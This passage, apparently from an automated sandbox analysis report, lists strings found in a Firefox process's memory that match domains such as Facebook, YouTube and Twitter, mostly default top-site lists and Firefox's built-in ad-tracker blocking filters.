data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFEB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2894451888.00000209A852D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2891470046.00000209A82F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2894451888.00000209A85E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.js equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]][{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.faceboo
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3EF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.2831590852.00000209A3E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.2893910824.00000209A8403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3023823448.00000209AFB77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.2728645310.00000209A8464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2893910824.00000209A845B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3032731152.00000209AFEB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2991507780.00000209AA355000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2831590852.00000209A3E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2946956724.00000209A9F77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
